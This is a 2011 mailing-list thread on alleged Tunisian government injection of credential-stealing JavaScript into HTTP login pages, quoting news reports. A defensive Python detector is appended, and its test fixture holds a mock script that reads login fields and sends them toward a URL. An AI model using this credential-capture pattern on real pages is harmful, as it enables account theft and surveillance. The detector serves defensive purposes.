[liberationtech] Tunisian government hacks into gmail and Facebook accounts
Jillian C. York
jilliancyork at gmail.com
Thu Jan 13 13:51:11 PST 2011
From what I'm seeing, the filters have been turned off entirely; even
Nawaat, which was allegedly blocked by keyword, is currently unfiltered
(Sami Ben Gharbia's piece on Tunisia's multilayered filtering system:
http://nawaat.org/portail/2010/08/19/a-first-glimpse-at-the-internet-filtering-in-tunisia/
).
-Jillian
On Thu, Jan 13, 2011 at 4:48 PM, Wagner, Ben <Ben.Wagner at eui.eu> wrote:
> Having hacked Gmail and Facebook accounts, the Tunisian government now
> claims that it wants to stop internet censorship entirely:
>
> "President Zine El Abidine Ben Ali, in a televised speech Thursday night,
> also pledged to end Internet censorship and to open up the political playing
> field in a country where he has allowed little public criticism for the past
> 23 years."
>
> Source:
> http://articles.moneycentral.msn.com/news/article.aspx?feed=AP&date=20110113&id=12601387
>
> At least some sites seem to have been unblocked including Youtube and the
> OpenNet initiative. Whether this is a permanent change or not remains to be
> seen. The general strike which is supposed to be taking place tomorrow may
> also have a significant impact on many of the 'promises' made by Ben
> Ali this evening.
>
>
> http://advocacy.globalvoicesonline.org/2011/01/13/is-tunisian-internet-censorship-shutting-down/
>
> Best,
> Ben
>
>
> On 13 Jan 2011, at 01:33, Terry Winograd wrote:
>
> > http://www.fastcompany.com/1715575/tunisian-government-hacking-facebook-gmail-anonymous
> >
> > Tunisian Government Allegedly Hacking Facebook, Gmail Accounts of
> > Dissidents and Journalists
> > BY Neal Ungerleider, Mon Jan 10, 2011
> >
> >> A strange bit of JavaScript has found its way onto Tunisian Internet
> >> users' internet login screens. Some are now in jail in a country known for
> >> torture. But they've been adopted by an unlikely ally: Anonymous.
> >
> > Massive riots and protests have rocked Tunisia this past month. After
> > a 26-year-old street vendor named Mohammed Bouazizi attempted to kill
> > himself by self-immolation (he survived and later died of his burns),
> > hundreds of thousands took to the North African nation's streets. The
> > protesters complain of unemployment, economic woes, and an omnipresent
> > dictatorship. Tunisia's government has stumbled upon a new method of
> > combating the protesters: hacking into their social media accounts.
> >
> > According to a report by the Committee to Protect Journalists, the
> > Tunisian government appears to be breaking into the Facebook, Google,
> > and Yahoo accounts of dissidents and journalists. Hackers with unusual
> > levels of access to Tunisia's state-controlled network infrastructure
> > have managed to gain access to Facebook accounts belonging to
> > individuals such as journalists Sofiene Chourabi of al-Tariq al-Jadid
> > (New Path; a newspaper affiliated with the opposition Movement
> > Ettajdid party) and independent video journalist Haythem El Mekki,
> > while gaining the passwords of others. Hack targets found that
> > Facebook groups they founded were deleted, as were pictures of
> > protests. In CPJ's words, "Their accounts and pictures of recent
> > protests have been deleted or otherwise compromised." Blogs hosted on
> > Blogspot and elsewhere are also being targeted. Here is an excerpt
> > from a post by Lina Ben Mhenni of the A Tunisian Girl blog:
> >
> >> Well, I can understand ... No I can't understand that some stupid person
> >> has hacked my e-mail then, my Facebook account. This stupid person has also
> >> deleted some pages in which I am an administrator. Pages like that of
> >> 7ellblog (launch a blog) which has been largely promoted even by official
> >> media, the page of the Tunisian singer Amel Mathlouthi, Reading Books is
> >> Better than Staring at others (yes they hate reading and culture in my
> >> country), the Tunisian blogosphere, and maybe a page against censorship
> >> 'la censure nuit à l'image de mon pays' (I don't have the confirmation yet)
> >> and many other pages were deleted. What happened is so shameful because the
> >> internet police is again confirming its stupidity and useless stubbornness.
> >> Sofiene Chourabi and Azyz Amami are experiencing the same problem now. They
> >> have been hacked.
> >
> > Already, in-depth information is surfacing on how the hacks were
> > committed. It appears that the Agence tunisienne d'Internet, a
> > government agency which supervises all of Tunisia's ISPs, or someone
> > with access to the agency committed them. Tunisian ISPs are running a
> > Java script that siphons off login credentials from users of Facebook,
> > Yahoo and Gmail. According to the Tech Herald's Steve Ragan:
> >
> >> Daniel Crowley, Technical Specialist for Core Security, and Rapid7’s
> >> Josh Abraham, broke the code down further. Crowley explained that the
> >> JavaScript is customized for each site’s login form. It will pull the
> >> username and password, and encode it with a weak crypto algorithm. The newly
> >> encrypted data is placed into the URL, and a randomly generated five
> >> character key is added. The randomly generated key is meaningless, but it is
> >> assumed that it’s there to add a false sense of legitimacy to the URL. The
> >> random characters and encrypted user information are delivered in the form
> >> of a GET request to a non working URL.
> >
> > The code only targeted users accessing HTTP sites instead of HTTPS,
> > which appears to be why Facebook was so heavily ravaged by the hack
> > plan. Facebook users default to using HTTP to access the site.
> >
> > Much of this information has been released to the public by the
> > quasi-4Chan allied Anonymous group, which has launched an
> > anti-Tunisian government hacker campaign called Operation: Tunisia.
> >
> > Amamou was taken into police custody this past week after authorities
> > apparently found his location via Foursquare. His current whereabouts
> > are unknown.
> >
> > The Agence tunisienne d'Internet has long been one of the most
> > censorship-happy government agencies in all of Africa. Tunisia's net
> > firewalls and intricate IP tracking mechanisms have been compared to
> > China's, while popular sites like YouTube and DailyMotion were banned
> > due to hosting videos alleging human rights abuses in Tunisian
> > prisons. In one of the WikiLeaks cables on Tunisia, an anonymous
> > diplomat notes endemic government corruption and refers to the
> > government of President-for-life Zine al-Abidine Ben Ali as a
> > “quasi-mafia” and a police state.
> >
> > While Facebook, Google and Yahoo have not spoken publicly on the
> > alleged Tunisian government hacking campaign yet, the State Department
> > has. In a press conference on Friday, January 7, spokesperson Philip
> > Crowley stated:
> >
> >> We are concerned about recent reports that Tunisian ISP providers, at
> >> the direction of the government, hacked into the accounts of Tunisian users
> >> of American companies including Facebook, and providers of email such as
> >> Yahoo and Google, and stealing passwords. This kind of interference
> >> threatens the ability of civil society to realize the benefits of new
> >> technologies. Cyber intrusions of all kinds, including reported attacks on
> >> government of Tunisia websites, disrupt the free flow of information and
> >> reduce overall confidence in the reliability and security of vital
> >> information networks.
> >
> > During the past week, in addition to Amamou, at least three other
> > members of Tunisia's hacker and blogger communities were taken into
> > custody by Tunisian police.
> >
> >
> > ----------------------------------
> >
> > http://www.thetechherald.com/article.php/201101/6651/Tunisian-government-harvesting-usernames-and-passwords
> >
> > Tunisian government harvesting usernames and passwords
> > by Steve Ragan - Jan 4 2011, 20:08
> >
> >
> > The Tunisian Internet Agency (Agence tunisienne d'Internet or ATI) is
> > being blamed for the presence of injected JavaScript that captures
> > usernames and passwords. The code has been discovered on login pages
> > for Gmail, Yahoo, and Facebook, and said to be the reason for the
> > recent rash of account hijackings reported by Tunisian protesters.
> >
> > ATI is run by the Tunisian Ministry of Communications. They supply all
> > of the privately held Tunisian ISPs, making them the main source of
> > Internet access in the country. They’ve been under scrutiny for years,
> > due to the fact that they make use of their authority to regulate the
> > entire national network. Last April, ATI earned international
> > attention by blocking access to sites such as Flickr, YouTube, and
> > Vimeo.
> >
> > According to Reporters Without Borders, authorities claim to target
> > only pornographic or terrorist websites. “However, censorship applies
> > above all to political opposition, independent news, and human rights
> > websites.”
> >
> > “When an Internet user attempts to access a prohibited website, the
> > following automatic error message appears: “Error 404: page not
> > found,” without displaying the familiar “Error 403” more typical of a
> > blocked site...This strategy equates to a disguised form of
> > censorship.”
> >
> > As for the JavaScript itself, The Tech Herald has seen examples of the
> > embedded script during live surfing sessions with sources in Tunisia,
> > and in posted source code made available to the Web. The source for
> > the GMail injection is here, the Yahoo injection is here, and Facebook
> > is here.
> >
> > Four different experts consulted by The Tech Herald independently
> > confirmed our thoughts; the embedded code is siphoning off login
> > credentials.
> >
> > On Twitter, security researcher Gerry Kavanagh and Errata Security CTO
> > David Maynor told us that you can tell the code is capturing login
> > information by how it references the login element for the form.
> >
> > “Suffice to say, the code is definitely doing something
> > surreptitious,” Kavanagh noted.
> >
> > Daniel Crowley, Technical Specialist for Core Security, and Rapid7’s
> > Josh Abraham, broke the code down further. Crowley explained that the
> > JavaScript is customized for each site’s login form. It will pull the
> > username and password, and encode it with a weak crypto algorithm.
> >
> > The newly encrypted data is placed into the URL, and a randomly
> > generated five character key is added. The randomly generated key is
> > meaningless, but it is assumed that it’s there to add a false sense of
> > legitimacy to the URL.
> >
> > The random characters and encrypted user information are delivered in
> > the form of a GET request to a non working URL. In the Gmail example,
> > you see this URL listed as http://www.google.com/wo0dh3ad. Abraham
> > noted that the encryption makes it easy to capture usernames and
> > passwords that would include special characters such as ‘%’ or ‘/’.
> >
> > Considering that the backbone of the Tunisian Internet is full of
> > state run filters and firewalls designed to block access, configuring
> > one to log the GET commands with the harvested data would be trivial.
> > But is this a government sponsored action?
> >
> > The likelihood that a group of criminals compromised the entire
> > Tunisian infrastructure is virtually nonexistent. Code planting on
> > this scale could only originate from an ISP. With their history of
> > holding an iron grip on the Internet, ATI is the logical source of the
> > information harvesting.
> >
> > There is an upside however, as the embedded JavaScript only appears
> > when one of the sites is accessed with HTTP instead of HTTPS. In each
> > test case, we were able to confirm that Gmail and Yahoo were only
> > compromised when HTTP was used. For Facebook on the other hand, the
> > default access is HTTP, so users in Tunisia will need to visit the
> > HTTPS address manually.
> >
> > Another interesting note is that it appears the embedded code has
> > targeted Tunisian users for several months. Slim Amamou, of the Global
> > Voices Advocacy blog, reported his findings on the code last July, and
> > at the time, ATI was blocking Google’s HTTPS port, forcing users to
> > default to HTTP.
> >
> > The information surrounding the embedded JavaScript came to our
> > attention thanks to a user on the IRC server where supporters for
> > Anonymous’ Operation: Tunisia gathered to show support for Tunisian
> > protesters. When word spread of embedded code and account hijackings,
> > Anonymous offered Tunisian users help via Userscripts.org, with a
> > browser add-on that strips the added JavaScript code.
> >
> > The ATI website has been offline for more than a day. The outage
> > started after Anonymous launched Operation: Tunisia. Our coverage on
> > their actions and the problems in Tunisia is here.
> >
> > --
> > _______________________________________________
> > liberationtech mailing list
> > liberationtech at lists.stanford.edu
> >
> > Should you need to change your subscription options, please go to:
> >
> > https://mailman.stanford.edu/mailman/listinfo/liberationtech
> >
> > If you would like to receive a daily digest, click "yes" (once you click
> > above) next to "would you like to receive list mail batched in a daily
> > digest?"
> >
> > You will need the user name and password you receive from the list
> > moderator in monthly reminders.
> >
> > Should you need immediate assistance, please contact the list moderator.
> >
>
>
--
Berkman Center for Internet and Society |
https://cyber.law.harvard.edu/people/jyork
jilliancyork.com | @jilliancyork | tel: +1-857-891-4244
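The quoted Tech Herald and Fast Company pieces describe the injection in enough detail to write a defender-side check for it: the credential-harvesting JavaScript was present only when a login page was fetched over plain HTTP, it was customised to each site's login form, and it sent the captured fields in a GET request to an unused path (the Gmail example used http://www.google.com/wo0dh3ad). The script below is an added example and is not code from this thread, from the articles it quotes, or from the Anonymous userscript they mention. It compares the inline scripts of the HTTP and HTTPS copies of a login page, reports any script that exists only in the HTTP copy, and flags those that both reference a credential field and name an absolute URL. The two HTML documents are constructed stand-ins (the field names `Email` and `Passwd` and the undefined `report` call are illustrative placeholders, not real Gmail markup), so the whole thing runs offline.

```python
"""
Differential check for script injected into the HTTP copy of a login page.
Added example; assumptions: the HTTPS copy of the page is a trustworthy
baseline (as the quoted articles observed), and a script that appears only
over HTTP, reads a password field and names an absolute URL is worth
reporting. The sample HTML below is constructed for this example.
"""
import re
from html.parser import HTMLParser


class _ScriptCollector(HTMLParser):
    """Collect inline <script> bodies plus the name/id of every <input>,
    remembering which of those inputs are password fields."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self.fields = set()
        self.password_fields = set()
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script" and "src" not in a:
            self._in_script = True
            self._buf = []
        elif tag == "input":
            names = {a[k] for k in ("name", "id") if a.get(k)}
            self.fields |= names
            if (a.get("type") or "").lower() == "password":
                self.password_fields |= names

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts.append("".join(self._buf).strip())
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands script text to handle_data (possibly in chunks).
        if self._in_script:
            self._buf.append(data)


URL_RE = re.compile(r"https?://[^\s'\"()<>]+")


def collect(html):
    """Parse one HTML document; return (inline scripts, fields, password fields)."""
    p = _ScriptCollector()
    p.feed(html)
    p.close()
    return p.scripts, p.fields, p.password_fields


def find_injected_scripts(http_html, https_html):
    """Return one finding per inline script that is present in the HTTP copy
    of a page but absent from the HTTPS copy. A finding is marked suspicious
    when the script references a password field and also names a URL."""
    http_scripts, fields, pw_fields = collect(http_html)
    https_scripts, _, _ = collect(https_html)
    baseline = set(https_scripts)
    findings = []
    for body in http_scripts:
        if body in baseline:
            continue  # same script served over HTTPS; not injected on the wire
        refs = sorted(f for f in fields if f in body)
        touches_pw = any(f in body for f in pw_fields)
        urls = sorted(set(URL_RE.findall(body)))
        findings.append({
            "script": body,
            "fields_referenced": refs,
            "touches_password_field": touches_pw,
            "urls": urls,
            "suspicious": touches_pw and bool(urls),
        })
    return findings


# Constructed stand-in for the page as served over HTTPS (the baseline).
HTTPS_LOGIN = """<html><body>
<form action="https://accounts.example.test/ServiceLogin" method="post">
<input type="email" name="Email" id="Email">
<input type="password" name="Passwd" id="Passwd">
<script>function toggleHint(){document.getElementById('hint').hidden=false;}</script>
</form></body></html>"""

# Constructed stand-in for the HTTP copy: identical, plus one extra inline
# script that reads both login fields and names an unused path, the shape the
# articles describe. `report` is deliberately undefined; this is a detection
# fixture, not working code.
HTTP_LOGIN = HTTPS_LOGIN.replace("</form>", """<script>
var c = document.getElementById('Email').value + ':' + document.getElementById('Passwd').value;
report('http://www.google.com/wo0dh3ad', c);
</script></form>""")


if __name__ == "__main__":
    for f in find_injected_scripts(HTTP_LOGIN, HTTPS_LOGIN):
        print("HTTP-only script, suspicious=%s, fields=%s, urls=%s"
              % (f["suspicious"], f["fields_referenced"], f["urls"]))
```

The HTTPS copy is only a useful baseline because, as the articles note, the injector left HTTPS traffic alone; an adversary positioned at the ISP who also intercepts TLS would defeat this comparison, which is why the lasting mitigation in the thread is to reach the login page over HTTPS in the first place and to treat any script present in one copy and not the other as a sign of on-path tampering.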